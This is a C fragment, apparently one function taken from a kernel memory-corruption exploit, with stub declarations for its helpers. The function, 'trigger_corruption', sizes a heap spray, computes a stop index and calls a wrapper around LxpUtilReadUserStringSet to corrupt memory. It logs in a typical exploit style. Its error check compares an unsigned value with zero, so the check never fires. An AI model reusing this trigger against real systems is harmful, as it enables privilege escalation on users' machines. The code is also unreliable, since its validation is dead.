
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 size_t calc_stop_idx (size_t,size_t) ;
 int call_LxpUtilReadUserStringSet (size_t,int,char,size_t) ;
 size_t get_size_factor (int,size_t*) ;
 int printf (char*,int) ;

int trigger_corruption(int spray_size) {
 size_t factor = 0, alloc_size, stopIdx;
 int ret;
 alloc_size = get_size_factor(spray_size, &factor);
 if (alloc_size < 0) {
  printf("[*err*] unsupported spray_size == 0x%x", spray_size);
  return -1;
 }

 stopIdx = calc_stop_idx(alloc_size, factor);

 ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
 printf("[*] trigger_corruption() returned 0x%x\n", ret);
 return 0;
}
